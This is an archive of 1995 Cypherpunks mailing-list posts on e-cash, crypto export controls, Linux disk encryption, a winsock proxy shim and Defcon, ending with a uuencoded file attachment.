current or future business plans are, > but I do expect more solid encryption, a la PGP or "real" RSA (licensed), > will be coming soon. I assume FV is planning for this likely development. Well, one thing we've announced in public is that if/when Visa and MasterCard actually announce the encryption standard that they have said they're going to define, we will support it. Basically, our attitude towards encryption has been that the lack of widely-agreed-upon standards and lack of widespread deployment were show-stoppers for large-scale commerce. Our hope is that if Visa & MC agree on a format, it won't have those problems. We didn't think that FV itself had enough clout to set an encryption standard for the world, nor did we see enough of a bandwagon behind the current PGP format (or any others). So we concentrated on making commerce work without encryption, building up our customer base, our customer service department, and so forth. We're promising our sellers as smooth a transition to the eventual standards as we can possibly manage... -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMAN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From rah at shipwright.com Wed Jul 26 07:08:23 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 26 Jul 95 07:08:23 PDT Subject: AP: Load Cash, Cruise Virtual Mall Message-ID: >WASHINGTON (AP) A day in the financial life of a future consumer may >begin something like this: Wake up, log in, download some e-cash into >your PC�s hard drive, then go cruise the virtual mall. > >It�s on the verge of happening, experts told Congress on Tuesday. But >some caution that, without planning and coordination, the brave new >Internet world of a cashless, checkless society could turn into an >electronic From: listproc at mcfeeley.cc.utexas.edu >Date: Sat, 20 May 1995 07:09:01 -0500 >Reply-To: listproc at mcfeeley.cc.utexas.edu >Sender: listproc at mcfeeley.cc.utexas.edu >To: rah at shipwright.com >Cc: grgcombs at mail.utexas.edu >Subject: SUBSCRIBE MCIP ROBERT HETTINGA >X-Comment: Unix List Processor, version 6.0c/940712/0 > >You have been added to list mcip at mcfeeley.cc.utexas.edu. >The system has recorded your address as > > rah at shipwright.com > >and in order for your messages to get posted (if the list accepts postings), >you will have to send them from this address, unless the list does not require >subscription for posting. >If a message is ever rejected, please contact the list's owner: >grgcombs at mail.utexas.edu > >Your initial password is 800971739. Please change it as soon as you can >by issuing the following request to listproc at mcfeeley.cc.utexas.edu: > > SET MCIP PASSWORD 800971739 new-password > >WARNING: Do not use your login password; you will be breaching security at your >site. > >This system may accept Internet TCP/IP connections for processing of live >requests, and the password will be used to give you subscriber privileges. >For more information, send a 'help live' request to >listproc at mcfeeley.cc.utexas.edu. > >For information on this service and how to use it, send the following >request in the body of a mail message to listproc at mcfeeley.cc.utexas.edu: > > HELP > >All requests should be addressed to listproc at mcfeeley.cc.utexas.edu. >We are currently working on making a better interface for MacPGP, and other >cryptographic programs, for Macintoshes. You can obtain our latest release >of the MacPGP Kit from ftp://duke.bwh.harvard.edu/pub/adam/mcip (The >official MCIP ftp site), or from >http://www.utexas.edu/~grgcombs/htmls/crypto.html (The unofficially >official MCIP home page). Knowledge of programming is not mandatory, but >it would be helpful. Being at least a mild Mac user (either now or in the >past) *is* mandatory. -- Gregory S. Combs >NOTE: For some reason our list processor doesn't like the version number >in PGP signed messages, so unless you want me to have to forward everything >you write to the MCIP list, please don't sign your mail. (ironic isn't >it? "Tower of Babel." > >"On the Internet ... it is difficult to tell if a transaction has taken >place since there is no central authority to track and report it," said >David M. Van Lear, chief executive of Electronic Payment Services Inc., >a 2 1/2-year-old joint venture of four banks. > >"There are currently no standard operating regulations," he said. "In >addition, there is no central authority to track and report on criminal >activity, including counterfeiting and money laundering." > >It was all a bit mind-boggling for members of the House Banking monetary > policy subcommittee, whose chairman, Rep. Michael Castle, R-Del., >observed, "Some of us can barely read our e-mail." > >But, more than 25,000 merchants in 150 countries are already on the >Internet, selling or advertising products and services to 20 million >users, a figure that will grow to 100 million within five years, >according to MasterCard International. > >So, Castle said, "it is time for lawmakers to start grappling with the >implications of �an entirely new monetary system in cyberspace, one that > transcends national governments and national boundaries." > >For instance, how will the Federal Reserve Board measure the amount and >velocity of money flowing through the Internet? How will the Internal >Revenue Service audit transactions conducted anonymously without paper >records? What laws apply when a U.S. consumer orders a product from a >business overseas and the goods never arrive? > >The lawmakers received seemingly conflicting advice from a panel of >experts that included Van Lear, executives from MasterCard and Visa >U.S.A. and Scott Cook, the chairman of the personal finance software >company, Intuit Inc. > >They were told that government will be crucial to fostering stability of > the new electronic monetary system and public trust in it but that >premature or too much regulation could stifle innovation. > >The new technology, the experts said, will both open new avenues for >fraud and offer new protections and safeguards. > >The system, some said, needs to be fully auditable so tax and criminal >authorities can reconstruct a series of transactions but it also should >protect Americans� privacy. > >For instance, David Chaum, the pony-tailed chairman of DigiCash Inc., >said his version of electronic cash, or e-cash, would provide the same >privacy protection and anonymity in small transactions as traditional >cash. > >Using encrypted codes and special software that offer much more security > than the current unprotected transfer of credit card information via >the Internet, consumers could download cash into the hard drive of their > personal computers. > >They'd spend it by transferring it to merchants via computer. Or they >could store the cash on "smart cards" equipped with a computer chip >capable of storing far more information than the magnetic strips now on >credit and debit cards. > >The cards then would function like pocket money and could be used in >vending machines, parking meters and subway turnstiles equipped to >receive them. > >MasterCard International and Visa are developing similar smart cards >but, unlike Chaum's, theirs would generate an audit trail that could >help law enforcement officials combatting tax evasion, counterfeiting >and money laundering. > >Rosalind L. Fisher, executive vice president of Visa, a consortium of >financial institutions, urged Congress to maintain public confidence in >new forms of electronic payment by allowing them to be offered only >through institutions to supervision by banking regulators. > >At the same time, she said, �we are concerned that additional regulation > in this area will "stifle innovations ... subjecting many of these >products to ... premature death." > >By way of example, she cited a Federal Reserve regulation that, if >applied, could require machines accepting smart cards to issue paper >receipts, ruining the economic viability of the cards for such small >purchases as a 75-cent soda. > >Castle, who plans at least one more hearing on the future of money this >fall, agreed that Congress should hold off on legislating for now but >should be prepared to move quickly if problems develop. > >"I don�t think we need regulations now, but we had better be ready to >respond ... if some guy can crack a code and create a million-dollar >account, transfer it around a couple times and end up in the Bahamas," >he said. > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From axon at neuron.net Wed Jul 26 07:50:42 1995 From: axon at neuron.net (Amir Y. Rosenblatt) Date: Wed, 26 Jul 95 07:50:42 PDT Subject: NSA and the NCSA/Apache web servers Message-ID: I was flipping through the Apache http Server Project's web site when I came across the following note: Note: We were informed by NCSA that the NSA (The US National Security Agency - yes, the folks who in 1994 said "we're only 10 years behind schedule") considered the hooks to encryption in NCSA's httpd to be in violation of the munitions export law, thereby making its distribution to foreign sites illegal. For various reasons, we decided to remove the -DPEM_AUTH code completely. This was followed by a pointer to http://www.apache.org/nopgp.html from which the following text was taken: On May 17th, 1995, we were asked by a representative of NCSA to remove any copies of NCSA httpd prior to 1.4.1 from our web site. They were mandated by the NSA to inform us that redistribution of pre-1.4.1 code violated the same laws that make distributing Phill Zimmerman's PGP package to other countries illegal. There was no encryption in NCSA's httpd, only hooks to publicly available libraries of PEM code. By the NSA's rules, even hooks to this type of application is illegal. Wow -- hooks to encryption are unexportable -- now THAT's bullshit. Sheesh. -Amir /\ Set the controls for the heart of the sun. -Pink Floyd ______/ \ ___________ __ __ _ _ _ _ . . . axon at neuron.net \ / \/ For PGP 2.6 key send mail with subject: SEND PGPKEY From paul at poboy.b17c.ingr.com Wed Jul 26 07:53:18 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 26 Jul 95 07:53:18 PDT Subject: Netscape the Big Win In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com> Message-ID: <199507261447.AA17788@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Hal said: > This sounds very good if it already is almost working. The TCP > connection which is opened would have to be to a server on the local > machine, so it would be important that the software support that. Also, > the local SOCKS relay would of course not want its winsock calls to be > intercepted and translated in this way, so there would need to be some > alternative way to access "vanilla" winsock. Can you give any > more information on the NEC work? This should be fairly straightforward: take the existing winsock.dll or winsock32.dll and rename it. Install the NEC DLL with the old winsock's name, then have the NEC DLL do a LoadLibrary() to attach the original version. > I have written a simple dummy relay for winsock and it requires a pretty > different programming style than for Unix. Netscape has a habit of > firing off a bunch of requests at once, so it has to be extremely > asynchronous. For Windows this means you get a windows message every > time a packet arrives and use non-blocking I/O. In Unix this is usually > handled by forking a new process to handle each independent connection. > Non-blocking I/O can be used in Unix but I don't think there is a > non-blocking connect as there is in Windows. Maybe Windows 95 will allow > a more Unix-style communication model, though. Should the proxy require > Windows 95, or will Windows 3 still be in widespread use for another > year or two? Asynchronous requests are the best way to implement I/O under Windows (3.1, '95, and NT.) Any app that's threaded (Free Agent and Netscape come to mind) will benefit, as will any user who's using a multiprocessor machine. If you're willing to assume the existence of Win95 or WinNT, you can always spawn a new thread for each connection. - -Paul - -- Paul Robichaux, KD4JZG | Do you support free speech? Even when perobich at ingr.com | you don't like what's being said? Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBZVcafb4pLe9tolAQHrHwQAhBAtIAZnaL2gh1BhZeE6WWQ1UQK7ffB2 XRZReUNzAVpCyvllKPDiN5TgUSuit8XeB4BzHOStXkNMJGlLE0vqTr5j5y2S0Fzo nisi5Ve5+8XWJ8wFrshldfFcLyFuOK3LeL9cAKXQQrQ2GdxluusqBzqYHFM8koPP zWI2YiF0VHM= =yzFt -----END PGP SIGNATURE----- From nobody at valhalla.phoenix.net Wed Jul 26 08:05:41 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Wed, 26 Jul 95 08:05:41 PDT Subject: Economist on Data Deluge (NewsClip) Message-ID: <199507261505.KAA06608@ valhalla.phoenix.net> The Economist, July 22, 1995, pp. 77-78. Data communications: Deluged The World Wide Web, as its fans will tell you, lives up to its name. This realm of the Internet lets you visit "home pages" in Bangkok one moment and Bridlington the next. Yet bringing home souvenirs is another matter. To pull all the nice goodies on offer back to his own machine, the home Internaut must squeeze them down a telephone wire. That slows things down, sometimes a lot; this correspondent took two hours to download 100 seconds of the film "Interview with a Vampire". There must be better ways to bring home the data. There are. One is the cables that deliver television to two out of three American homes. Companies such as Intel, General Instruments and Zenith Electronics have been rushing to perfect "cable modems" that squirt data into a personal computer at speeds up to 4m bits per second -- 140 times faster than the speediest telephone modems (28,800 bits per second) used with PCs. But cable modems must wait for the cable-TV companies to rewire their networks with two-way connections; at the moment, cable TV is largely one way. Cable companies such as Tele-Communications Inc, Viacom and Cox expect to offer data connections with TV services within a year. Some Internet surfers are not prepared to wait that long. For the past three months, some data-junkies in America have been downloading from the sky. Hughes, having laid down a challenge to the cable companies with its DirecTV satellite broadcasting system, which is currently providing 150 channels to 500,000 subscribers, is now laying down another. Hughes Network Systems of Germantown, Maryland, is offering a satellite service called Direcrc that can beam down data to a subscriber at a rate of 400,000 bits a second -- enough to transmit a 400-page document in less than a minute. With moderate compression techniques, that would easily allow real-time video. For $995, the DirecPC customer gets a 61-centimetre (24-inch) satellite dish, a coaxial cable, an adapter that fits inside an IBM-type PC and the relevant software. Once installed, subscribers pay $15.95 to download up to 30 megabytes of data a month (which is a lot of text, but not much video). The speed is many times faster than a special digital ISDN line from the telephone company, and the initial cost less (though with the ISDN line time is the only limit on the amount of data downloaded). For an extra $24 a DirecPC customer can get up to 130 megabytes a month. The cable-TV companies are spending $7,000 or more a mile (over $4,000 a kilometre) to make their cables funnel data out as well as television in. Hughes has sidestepped this problem. Subscribers send data out -- generally small bursts to request information, transmit messages and the like -- through a normal telephone modem. These few bytes can trigger a torrent of returned data, taking the fast route to a Hughes ground station, which beams it to a Galaxy IV communications satellite in geosynchronous orbit. From there it is retransmitted to the subscriber's mini-dish. Apart from reaching the Internet and other online services such as news, electronic shopping, stockmarket prices and sports results, Hughes plans to use DirecPC and its successors to distribute large packages of data on behalf of commercial customers -- acting, in effect, as the Federal Express of the digital world. The company has already signed a deal with IBM to deliver software by satellite direct to shops, where it will be replicated on disks or CD-ROMS at the customer's request. Using better equipment, Hughes reckons it should have no difficulty delivering digital packages at up to 2m bits a second. Sooner or later, the cable-TV companies will lick the "back haul" problem. Then, one-way satellite systems such as DirecPC may find themselves squeezed out of the business -- unless they, too, offer subscribers the chance to talk back with a mouth as big as their ears. Hughes has plans to allow such interchanges through a system called Spaceway. Satellites with huge antennae would pick up messages from little dishes and relay them to other little dishes, allowing high data-transmission rates all over the world. The company, with a touch of hype, calls it an "information super skyway". ----- From sjb at austin.ibm.com Wed Jul 26 08:28:57 1995 From: sjb at austin.ibm.com (Scott Brickner) Date: Wed, 26 Jul 95 08:28:57 PDT Subject: Three strikes you're out! for politicians... yeah we wish! In-Reply-To: <2751@umlaw.demon.co.uk> Message-ID: <9507261527.AA17090@ozymandias.austin.ibm.com> In message <2751 at umlaw.demon.co.uk> Michael Froomkin writes: >> Therefore, the only organization which can hold a >> senator/representative liable for passing a bad law is the one which >> passed the law. :( >and the voters Not in the sense of being able to punish him. The voters may only withold their support in the next election. Not nearly enough to deter morons like Exon. From dlv at bwalk.dm.com Wed Jul 26 08:44:46 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 26 Jul 95 08:44:46 PDT Subject: Crypto Law Survey In-Reply-To: Message-ID: I seem to recall that COCOM voted itself out of existence last year. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From Michael at umlaw.demon.co.uk Wed Jul 26 09:30:56 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Wed, 26 Jul 95 09:30:56 PDT Subject: Crypto Law Survey Message-ID: <2769@umlaw.demon.co.uk> Thank you for your useful survey. May I make two comments about the US section? First, many lawyers believe the ITAR to be unconstitutional as applied to some or all cryptographic algorithims and software; a court test is likely within the next few years. Second, the American Bar Association Section on Science and Technology's Information Security Committee is drafting Guidelines and Model Legislation which, if they are ever completed, will improve upon the Utah initiative. Meanwhile, other states, including California, are considering bills that are similar to Utah's. -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html From jcorgan at aeinet.com Wed Jul 26 10:03:19 1995 From: jcorgan at aeinet.com (Johnathan Corgan) Date: Wed, 26 Jul 95 10:03:19 PDT Subject: Encrypting block driver for Linux...need some advice Message-ID: -----BEGIN PGP SIGNED MESSAGE----- All, I dropped off the face of the earth for a few months while fighting a particularly *nasty* divorce, and to nurse my wounds, I immersed myself in writing cypto-code :) What I've come up with is a loadable module block device driver for Linux that implements transparent encryption/decryption (is there a generic word that means both, like 'cryption' or some such?). The way it works is by 'attaching' a filespec to the block driver, and translating block requests into read/write requests at the appropriate offset in the file. During the read or write, the data is transformed with either DES or 3DES (RSAREF implementation). The key is an MD5 hashed passphrase entered by the user when attaching the filespec. The key is not stored anywhere, and there is no hidden structure to the ciphertext (such as a header block.) The filespec can represent pretty much anything--another block device such as a hard drive partition or floppy drive, a regular file, a remote NFS exported file, CDROM, whatever. If the file is remote, only ciphertext is transmitted on the wire. This part is working rather well at this point (as long as everything is done as root), which brings me to the crux of my post. Being a Unix programming novice (lots of C experience on DOS/Windows), I'm pretty clueless when it comes to Unix level security issues. I need to define and implement the appropriate behavior of the device when dealing with access to the data by different users. Ideally, I want something infinitely flexible and configurable--why program in policy?--so that the user/admin can deal with a variety of threat models. Another, more crypto related question--how to deal with IV's? Right now, I'm using 512 byte sectors with CBC. For each sector, the IV is the sector number. This frustrates the known plaintext attack issue, but I'm not sure if such a simple scheme is really effective. Probably not. Then there is a whole host of issues relating to cryptographically hygienic programming practices...of which I am also pretty ignorant (especially on Unix.) I guess you could say the software is at the "proof of concept" stage, and lacks all sorts of desirable features. But it works (with many bugs I'm sure)...and I have to give credit to the Linux effort: so far I've done this with nothing but the kernel source and the kernel hackers guide as a reference. I took a look at doing this with Windows 95 and didn't even know where to start. (No, I'm not bashing Windows--I love Win95, use it all day at the office and get loads of work done with it--but Linux kernel hacking is much more fun. An ideal world would have the Win95 UI/Plug & Play stuff coded on top of a Unix kernel :) In any case, suggestions, criticism, and comments are welcome. The software will eventually be GPL licensed when it is a bit more mature. == Johnathan Corgan "For the first time in history, it is possible to jcorgan at aeinet.com have absolute privacy over arbitrary distances." PGP Key Fingerprint: 4F 28 69 B8 76 2E 42 3E 8B 4C 12 BB 3A 43 D4 07 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBaCnU1Diok8GKihAQGyoQP+JAYyukotfejK84bm8olDs1GMd6zlwuXc S+91DwrPRb8pyciEC6lIoLNS3coMgPdGTEksNNJMbuIXupJNnXnSum9XrPkMzEkG gL/x6n6v4Jzm9B9IyvIV2R1UrIK893EGQbPKTIgGNNsvORJ/NB8nkoMfZalVlNnD Hl3z3vaYgtU= =grpJ -----END PGP SIGNATURE----- From gt7508b at prism.gatech.edu Wed Jul 26 10:25:56 1995 From: gt7508b at prism.gatech.edu (PHrEaK!) Date: Wed, 26 Jul 95 10:25:56 PDT Subject: Defcon agenda In-Reply-To: Message-ID: <199507261722.NAA22774@acmew.gatech.edu> > Can some kind soul forward me a copy of the agenda for Defcon? I need > dates and times for the various speakers. > > Thanks, > Sam > You can get it from http://underground.org/conventions/defcon/defcon3/ -- =-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=- -=-=-=-=-=- TWN615 at mindvox.phantom.com GT7508B at prism.gatech.edu =-=-=-=-=-=-= =- "Government is not a reason, not an eloquence; it is a force. Like fire, =- -=- it is a dangerous servant and a fearful master." -- George Washington -=-= From Phiberflea at aol.com Wed Jul 26 10:46:17 1995 From: Phiberflea at aol.com (Phiberflea at aol.com) Date: Wed, 26 Jul 95 10:46:17 PDT Subject: Questions about Conferences Message-ID: <950726134606_123430063@aol.com> Joel Hames wrote: What is Defcon? Perry Metzger responded: >Some hacker convention. It doesn't have anything to do with crypto per se. Here are just two of the topics which will be discussed: Bruce Schneier, Author of "Applied Cryptography". TOPIC: Will speak on issues surrounding cryptography, digital authentication, digital cash. EFF. TOPIC: Will cover current legal threats, privacy and computer information networks. I believe last year's key speak was Mr. Phil Zimmerman. There are currently 22 speakers registered for this year's convention. :) See ya in Vegas. From cjl at welchlink.welch.jhu.edu Wed Jul 26 11:02:22 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Wed, 26 Jul 95 11:02:22 PDT Subject: Crypto Law Survey In-Reply-To: <2769@umlaw.demon.co.uk> Message-ID: This list might usefully be supplemented by an electronic censorship law review as the two issues are inextricably intertwined. There is a news piece in the 20th July issue of NATURE saying that in the UK, the Lord Chancellor, Lord Mackay of Clashfern will be floating draft legislation to protect ISP's from defamation actions brought about by posts from their users. Mackay's Defamation Bill does not address USENET and moderated discussion groups apparently. Do our UK-centric readers have any more details on the proposals? C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From rah at shipwright.com Wed Jul 26 11:31:48 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 26 Jul 95 11:31:48 PDT Subject: AP: Load Cash, Cruise Virtual Mall Message-ID: Or so we thought until my emailer urped: >>electronic From: listproc at mcfeeley.cc.utexas.edu >>Date: Sat, 20 May 1995 07:09:01 -0500 >>Reply-To: listproc at mcfeeley.cc.utexas.edu >>Sender: listproc at mcfeeley.cc.utexas.edu >>To: rah at shipwright.com >>Cc: grgcombs at mail.utexas.edu >>Subject: SUBSCRIBE MCIP ROBERT HETTINGA >>X-Comment: Unix List Processor, version 6.0c/940712/0 >> >>You have been added to list mcip at mcfeeley.cc.utexas.edu. >>The system has recorded your address as >> >> rah at shipwright.com >> >>and in order for your messages to get posted (if the list accepts postings), >>you will have to send them from this address, unless the list does not require >>subscription for posting. Well, you get the point. My apologies. Maybe I should do my mail in Netscape instead... ;-) Now I suppose it's time to change my mcip password, eh? Feh. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From KDAGUIO at aba.com Wed Jul 26 11:32:57 1995 From: KDAGUIO at aba.com (KDAGUIO at aba.com) Date: Wed, 26 Jul 95 11:32:57 PDT Subject: Banks and Crypto Message-ID: See attached file: F:\OFFILES\KODMAIL.MSG begin 666 KODMAIL.MSG M_U=00Z\L```!"@`!`````/O_!0`R`.$%```)``(```!"`````P`Q````6P`` M```"U at 0``+$````,`%H```"'!0``1/L at 5&EM97, at 0F]L9"`H4V-A;&%B;&4I M`-`&!@`!``8`!M#1`2,``.@";`"0&D01=`D``````%"&`'SZ40$#``%W(U@" M4",``=&0_O[^_O[^_O_^_________O__________________________``$B M`((`;0&"`=L!*P)/`C8#_0/0!/_____4!/_______UX[0UUD9+*D0T-#9+)# M0T-#9&1D9&1D9&1D9$-#R++(9+*0A9"0A7B&^09)!DD&20 M69!9D%F069!OA5F%6859A5F<9)QDG&2<9)QDG&2<;YQO3CA..$XX3CBU'AX>'AX>'AX>'AX>'AX>'AX M>'AX>'AX>'AX>'AX>'AX>'AX>'AX>$Z0D)!D`&1D0V15561DPV1D9+*R9$9D M9&1DLD8`0T,`IS(D,@```#(R`````!5=@`````````` M````````````````````````````````````````````````````D)"0D``` M````````````````````````````R,@`````````````R```````````R,@` M``````````#(Q9"0D&20D,B0D,C(R````)"0````D&0```"0D)"09````)"0 MD)"0````D)"0````D)"0````D)"0````D)"0D)"0D)"0D)"0D)```````)`` M``"0D)"0D)````"0D)"0D)"0D)!#````D)"00P```)"0D$,```"0D)!#```` MD)"0D````)`````````````````````````````````````````````````` M``````````````````"0````D)"0D````)"0D-&0>H5O``!Z;X59A4Z%69Q9 MD%E..)Q9A6^];Y!9A62<69!Z>F1Z9`!DA5F0685ZD&^<>GIZ>DY9.#A965EZ M67H`>@!Z>@!#0V1D9&1D`````````````&1D````````````>GIZ>GIZ>GIZ M>GIZ>GIZ>GIZ>DY.3DY.3DY965E965E965E965E965E965E963 at X.#@X.#@X M.#@X.%E965E965E965E965E965E965EZ>GIZ>GIZ>GIZ>GIZ>GIZ>GIZ>D,` M`'H``)"%G$Z@#S&;@17P@````0('#L`%X0 M-Q+[`2P!"`%<`2P!\#4<'&!8`I#[_P4`,@"("0``!@`0````$P8``/__+P`` M`$0&```!`KT!``!S!@``__]8`0``,`@```@C?`!L`````0`````````";`"0 M&D01=`D``````%"&`'SZ40$#``%VE5@"4",``=%#1R!4:6UE0T!H<'"`K#Q,3&QP.$@X@'!P<'!P<'!P M<'`X.'!P<$B,B(24I(1TG+!04(R`P*2H>*B,:(BHC+R$>(Q0.%!P9#Q8<%AP M7#QL<#0T9#2H<'!L<$A(1'!%RD<'9LB%B(6(A8E%B46)18E%BD<(1< MA%R$7(1&QX M2&]O<'#!<&QLJ*AP3$QD9'"H3`!#0P!D9'[(9&3(R'Y^>GJ8R&3(9)!D`(FY MN7IZR```````0V0```````!D``#!`,@``$RR`04`D0`W`'H`0P`[`"P!`0`` M``%);%@">@#S&;@17P@````0('#L`%X0-Q+[`5@"D/[^_O[^_O[__O______ M__[__________________________P8'#P"0`#@`;`!#`$,`+`$!`!D``'6QE`"!3='EL90`````````````````````````````````````````` M```!%@"Z`P@`H(H``,(`6`((!P@'#P#"P@%8`F`)8`D4`,+&T"!@"<8*"G]A M-$1O8W5M96YT`&<``````````(%$;V-U;65N="!3='EL90`@4W1Y;&4````` M`````````````````````````````````````````@\`C]@&`*K6`P#!`@@' M"`6QE```````````````````````````````````` M``````````,+`+VS"`!'A@``P@%8`@@'"`6QE```````````````````````````````````````````` M``4\`/%O"P#'$P8`"M0!#```!HD`/P#(``P``=3##,/8`1<`@0`````````` M``````````!!+A<``=@@PP[#UP`%``$%``#7UP$%``$%``'7"@K$#,3$#L1_ M83=$;V-U;65N=`!G``````````#!1&]C=6UE;G0 at 4W1Y;&4`(%-T>6QE```` M``````````````````````````````````````````86`'G]"``&A@``P@!8 M`@@'"`0`````````````````````````````````````` M```````````````````'%`"LBP@`ACH``,(`6`((!P@'#P#"P8"P!+`$"@#! MQB at C"`?&"@I_83%2:6=H="!087(```````````#!4FEG:'0M06QI9VYE9"!0 M87)A9W)A<&@@3G5M8F5R6QE`"!3='EL90`````````````````````````````````````````` M```*0@``,+&*",0#L8*"OO_!0`R M`!`4```-`;\```#@$```#@'(````GQ$```\!T````&<2```0`=D````W$P`` M?V$U4FEG:'0 at 4&%R````````````P5)I9VAT+4%L:6=N960 at 4&%R86=R87!H M($YU;6)E`,'!`F at 0:!`C`,'!`L`2P!(H`,'!0+`3&!4J M`,'8`1<`!@````````````````````!I*1<``=@@@\&`P!+`$B@`P<(`:!`8 M%1 at 5+0#"QB at C&!7&"@I_83A2:6=H="!087(```````````#!4FEG:'0M06QI M9VYE9"!087)A9W)A<&@@3G5M8F5R6QE`````````````````````````````````````````````!%8 M`'$'%@!Q#08`V0$%```%``'9"M0!#```!N$`;`#(``P``=3!X%X3[!,I`,'# M`#"@K$`<3$#,1$;V, at 26YI=``` M```````````````!26YI=&EA;&EZ92!$;V-U;65N="!3='EL90`````````` M`````````````````````````````!(.``'_Q0`"DP``UP(*``($!`0$!`H` M`M?4`!@``!(```$````````````P*C`JL`08``#4#-("C``@22X at 02X@,2X@ M82XH,2DH82D@:2D at 82D`````````````````````($DN(#$N($$N(&$N*#$I M*&$I(&DI(&$I```````````````````````````````````````````````` M``%$;V-U;65N=`!G````````````````````````````````C``"TMD$%``` M````````````````````%``$V51E8V@@26YI=`````````````````!);FET M:6%L:7IE(%1E8VAN:6-A;"!3='EL90`````````````````````````````` M````````$Z@`%"X```UK``#2`HP`($DN($$N(#$N(&$N*#$I*&$I(&DI(&$I M`````````````````````"`Q("XQ("XQ("XQ("XQ("XQ("XQ("XQ(``````` M`````````````````````````````````````````/X`5&5C:&YI8V%L```` M`````````````````````````````(P``M+9!!0````````````````````` M`!0`!-E_835496-H;FEC86P```````````"!5&5C:&YI8V%L($1O8W5M96YT M(%-T>6QE`````````````````````````````````````````!0I`%?9`P!$ MO@,`P0((!P@'#P#!PPS#V`$8`(0`````````````````````*#$I&``!V"`N M("#$#,3[_P4`,@!T&@``%0&'````\A<``!8!K@```'D8```7`:<````G&0`` M&`&F````SAD``']A-E1E8VAN:6-A;````````````(%496-H;FEC86P at 1&]C M=6UE;G0 at 4W1Y;&4`````````````````````````````````````````%2D` ME^`#`$3"`P#!`@@'"`6QE```` M`````````````````````````````````````!HH`$`7`P!$Q@,`P0((!P@' M#P#!PPS#V`$7`(8`````````````````````:2D7``'8("X@(,0,Q']A.%1E M8VAN:6-A;````````````(%496-H;FEC86P at 1&]C=6UE;G0 at 4W1Y;&4````` M````````````````````````````````````&R@`X!H#`$3+`P#!`@@'"`T"`H(X`EV"0`&V at H*P4A(`\`# M!P#!,8,*"L%(2`/``P<`P3*#"@K!2$@#P`,'`,$S at PH*P4A(`\`#!P#!-(,* M"L%(2`/``P<`P36#"@K!2$@#P`,'`,$V at PH*P4A(`\`#!P#!-X,*"L%(2`/` M`P<`P3B#"@K!2$@#P`,'`,$Y at PH*P4C0`L`#!@#!,3"#"@K!2-`"P`,&`,$Q M,8,*"L%(T`+``P8`P3$R at PH*P4C0`L`#!@#!,3.#"@K!2-`"P`,&`,$Q-(,* M"L%(T`+``P8`P3$U at PH*P4C0`L`#!@#!,3:#"@K!2-`"P`,&`,$Q-X,*"L%( MT`+``P8`P3$X at PH*P4C0`L`#!@#!,3F#"@K!2-`"P`,&`,$R,(,*"L%(T`+` M`P8`P3(Q at PH*P4C0`L`#!@#!,C*#"@K!2-`"P`,&`,$R,X,*"L%(T`+``P8` MP3(T at PH*P4C0`L`#!@#!,C6#"@K!2-`"P`,&`,$R-H,*"L%(T`+``P8`P3(W M at PH*P4C0`L`#!@#!,CC3!@D``<`K(`,)``;3BP,!U?O_!0`R`*0E```=`7T! M``"I(```'@%]`0``)B(``/__1````*,C```"`KT!``#G(P``4W1A9V5G=6ED M90```````````````%-T86=I;F<@1W5I9&4 at 1F]R;6%T```````````````` M```````````````````````````````=)0'_E@``E0,``-$!(P``)@)D`(0< M?!7\"``````00(X`-RY1$`,``3OV6`)`(P`!T=`%#`"P!+`$=`2P!`P`!=#0 M`0P`L`2P!(0#A`,,``'0T`30````6`*P!`@'8`FX"Q`.:!#`$A at 5![0("@C@"78)S`JB"S at +C@QD#/H-4`XF#KP/$@_H$'_________________ M____________```````````````````````````L`;X%>!C_____________ M____________________________________________________________ M_________________________P``````````````````````````L`2$`]`` M!-#0!@8``0`&``;04W1A9V5G`````````````````````%-T86=I;F<@1W5I M9&4 at 1F]R;6%T('=I=&@@0V]U M)0&FW```:B\``-$!(P``]`%X`!0>#!>,"@````010,D`DSC'$3L``!\I6`)` M(P`!T=`%#`"P!+`$=`2P!`P`!=#0`0P`L`2P!(0#A`,,``'0T`30````6`*P M!`@'8`FX"Q`.:!#`$A at 5![0("@C@"78)S`JB"S at +C@QD#/H-4`X MF#KP/$@_H$'_____________________________```````````````````` M```````L`;X%>!C_____________________________________________ M_____________________________________________________P`````` M````````````````````L`2$`]``!-#0!@8``0`&``;00T<@5&EM97, at 0F]L M9"`H4V-A;&%B;&4I`$=A;&QI87)D+5)O;6%N(#$R+C!P=`!'86QL:6%R9"U" M;VQD(#$R+C!P=````2(`@@#_____;0'_____________________________ 